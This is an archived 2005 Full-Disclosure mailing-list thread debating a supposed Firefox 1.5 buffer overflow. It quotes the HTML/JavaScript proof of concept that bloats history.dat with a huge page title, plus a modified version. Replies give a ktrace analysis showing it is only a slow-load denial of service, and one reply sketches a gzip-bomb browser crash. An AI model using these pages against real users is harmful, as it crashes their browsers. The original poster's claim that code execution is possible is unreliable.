lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Sat Dec 10 03:26:04 2005
From: fosforo at gmail.com (Fósforo)
Subject: Firefox 1.5 buffer overflow (poc) - more buffer
	"overflows" waiting to be discovered

tip: only erasing \Documents and
Settings\Administrador.COMP-NAME\Dados de
aplicativos\Mozilla\Firefox\Profiles\history.dat

your firefox will start without crash your machine (blue screen) every
time you load it...

t+

2005/12/9, F?sforo <fosforo@...il.com>:
> It works here.
>
> seems it depends on how much ram you've. i got 2 blue screens, after
> changed the code a bit. the first one was about MEMORY_MANAGEMENT and
> the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occurs
> without user interaction, the second one i just've opened firefox, not
> the bug file (maybe cache ?)
>
> ps: i've 1Gb of ram
>
> <html><head><title>heh</title><script type="text/javascript">
> function ex() {
>        var buffer = "";
>        for (var i = 0; i < 5000; i++) {
>                buffer += "A";
>        }
>        var buffer2 = buffer;
>        var buffer3 = buffer2;
>        for (i = 0; i < 500; i++) {
>                buffer2 += buffer;
>                for (i = 0; i < 500; i++) {
>                         buffer3 += buffer2;
>                }
>        }
>        document.title = buffer2;
> }
> </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
> </a></body></html>
>
>
>
> 2006/1/31, ezdy <ezdy@....com>:
> > and theres no reason for it to be working.
> > first let's see what's going on - i loaded provided html in firefox
> > and quitted it.
> > even quitting firefox took a while, but only slightly longer than usual.
> > after starting firefox again, it indeed didn't load, stuck in some
> > kind of disk loop ignoring all macosx ui events.
> > but not swapping. alright, that's strange:
> >
> > ezdy@...astace:~/Desktop/Firefox.app/Contents/MacOS$ ktrace ./firefox-
> > bin
> > ezdy@...astace:~/Desktop/Firefox.app/Contents/MacOS$ kdump -m 1 |
> > tail -100
> > ...
> >   7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
> >   7616 firefox-bin GIO   fd 24 read 4096 bytes
> >        "0"
> >   7616 firefox-bin RET   read 4096/0x1000
> >   7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
> >   7616 firefox-bin GIO   fd 24 read 4096 bytes
> >        "0"
> >   7616 firefox-bin RET   read 4096/0x1000
> >   7616 firefox-bin CALL  lseek(0x18,0x21a000,0)
> >   7616 firefox-bin RET   lseek 0
> >   7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
> >   7616 firefox-bin GIO   fd 24 read 4096 bytes
> >        "0"
> >   7616 firefox-bin RET   read 4096/0x1000
> >   7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
> >   7616 firefox-bin GIO   fd 24 read 4096 bytes
> >        "\\"
> >   7616 firefox-bin RET   read 4096/0x1000
> >   7616 firefox-bin CALL  lseek(0x18,0x21c000,0)
> >   7616 firefox-bin RET   lseek 0
> >   7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
> >   7616 firefox-bin GIO   fd 24 read 4096 bytes
> >        "A"
> >   7616 firefox-bin RET   read 4096/0x1000
> >   7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
> >   7616 firefox-bin GIO   fd 24 read 4096 bytes
> >        "A"
> >   7616 firefox-bin RET   read 4096/0x1000
> >   7616 firefox-bin CALL  lseek(0x18,0x21e000,0)
> >   7616 firefox-bin RET   lseek 0
> >   7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
> >
> > this repeats virtually ad-infinitum until end of history.dat is reached.
> > note that there is never allocated any memory-the same buffer is
> > always used, thus no memory leak.
> > firefox is stuck in loop (and eventually starts, since the string is
> > finite, in my case
> > about 30M) but it took way too longer to load. im not a windows user
> > but since mac is only
> > step away from it (you know apple, let's take win95 and freebsd and
> > mix it together) my guess is
> > it is the same situation of keeping main thread busy and events
> > cannot be passed down, eventualy
> > leading to "application is not responding" killbox.
> >
> > for Z1PL0CK:
> > Don't stop, keep posting fake "buffer overflows" of #darknet
> > trademonkeys (this one actually looked funny in the beggining).
> > This time you made it to get /.ed which is not a bad start, but yo
> > gonna fly higher!
> >
> > Because this bug got killed, i've something better for you:
> > dd if=/dev/zero a 2GB file and gzip it. then just write a php script
> > which sets content-encoding: gzip and
> > fpassthru the file. safari rendered 1.2gb system unresponsible in 5
> > seconds, firefox in about 30. both crashed
> > on "overflows" like this:
> >
> > Safari(233,0xa000ed68) malloc: *** vm_allocate(size=1250000896)
> > failed (error code=3)
> > Safari(233,0xa000ed68) malloc: *** error: can't allocate region
> > Safari(233,0xa000ed68) malloc: *** set a breakpoint in szone_error to
> > debug
> >
> > for those interested i can send coredumps
> >
> > now THATs SOME SERIOUSLY MAD warez (for those who wants to quickly
> > pollute browser's heap with shellcode: yah, this
> > is a good way).
> >
> > sheesh. is this some 'who invent a stupidier dos attack against
> > browser' contest of some sort or what?
> >
> > On 8.12.2005, at 20:51, Matt wrote:
> >
> > > Didn't work here, just made the system go a bit sluggish for a
> > > moment, as you would expect when dealing with a 2.5  million
> > > character string.
> > >
> > > Firefox :
> > > Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.8) Gecko/20051130
> > > Firefox/1.5
> > > Built with :
> > > gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8)
> > > Window manager:
> > > KDE 3.5.0
> > >
> > > Possibly it is crashing the Windows API ?
> > >
> > > --
> > > Matt
> > >
> > >
> > > On 12/9/05, Ron <iago@...hallalegends.com > wrote:I was also unable
> > > to replicate it, on Firefox 1.5 i386 Linux EN
> > >
> > > ad@...poverflow.com wrote:
> > > > -----BEGIN PGP SIGNED MESSAGE-----
> > > > Hash: SHA1
> > > >
> > > > nor a fake , nor you really dont know what is a buffer overflow,
> > > but for
> > > > sure here on my firefox 1.5 EN, the client is much longuer to
> > > load to
> > > > the next boot but it reloads fine without exceptions and there is
> > > > nothing about a security bug here...
> > > >
> > > >
> > > >> <!-- Firefox 1.5 buffer overflow
> > > >>
> > > >> Basically firefox logs all kinda of URL data in it's history.dat
> > > file,
> > > >> this little script will set a really large topic and Firefox
> > > will then
> > > >> save that topic into it's history.dat.. The next time that
> > > firefox is
> > > >> opened, it will instantly crash due to a buffer overflow -- this
> > > will
> > > >> happen everytime until you manually delete the history.dat file
> > > -- >which
> > > >> most users won't figure out.
> > > >>
> > > >> this proof of concept will only prevent someone from reopening
> > > >> their browser after being exploited. DoS if you will. however, code
> > > >> execution is possible with some modifcations.
> > > >>
> > > >> Tested with Firefox 1.5 on Windows XP SP2.
> > > >>
> > > >> ZIPLOCK <sickbeatz@...il.com>
> > > >>
> > > >> -->
> > > >> <html><head><title>heh</title><script type="text/javascript">
> > > >> function ex() {
> > > >>      var buffer = "";
> > > >>      for (var i = 0; i < 5000; i++) {
> > > >>              buffer += "A";
> > > >>      }
> > > >>      var buffer2 = buffer;
> > > >>      for (i = 0; i < 500; i++) {
> > > >>              buffer2 += buffer;
> > > >>      }
> > > >>      document.title = buffer2;
> > > >> }
> > > >> </script></head><body>ZIPLOCK says <a href="javascript:ex
> > > ();">CLICK ME
> > > >> </a></body></html>
> > > > -----BEGIN PGP SIGNATURE-----
> > > > Version: GnuPG v1.4.2 (MingW32)
> > > >
> > > > iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
> > > > 4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
> > > > Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
> > > > DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
> > > > /Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
> > > > crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
> > > > cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
> > > > pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
> > > > 5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
> > > > AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
> > > > 2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
> > > > IFxjTMn8Sc0=
> > > > =SX09
> > > > -----END PGP SIGNATURE-----
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> --
>
> ----------------------------------------------
>
> "O  caminho  do  homem  de  bem  ?  cercado de
> todos os lados  pelas  iniq?idades do  ego?smo
> e tirania  dos homens maus.  Aben?oados os que,
> em  nome da caridade e  boa vontade,  conduzem
> os  fracos pelo  vale das  sombras, pois ele ?
> o  guardi?o  de seu irm?o e o  que encontra os
> filhos perdidos. E eu vou  atacar com vingan?a
> e f?ria  os que tentarem  envenenar e destruir
> meus irm?os. E quando minha vingan?a se abater
> sobre  eles,  saber?o  que  eu sou  o Senhor."
>
> (Ezequiel, 25, 17)
>
>
>


--

----------------------------------------------

"O  caminho  do  homem  de  bem  ?  cercado de
todos os lados  pelas  iniq?idades do  ego?smo
e tirania  dos homens maus.  Aben?oados os que,
em  nome da caridade e  boa vontade,  conduzem
os  fracos pelo  vale das  sombras, pois ele ?
o  guardi?o  de seu irm?o e o  que encontra os
filhos perdidos. E eu vou  atacar com vingan?a
e f?ria  os que tentarem  envenenar e destruir
meus irm?os. E quando minha vingan?a se abater
sobre  eles,  saber?o  que  eu sou  o Senhor."

(Ezequiel, 25, 17)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ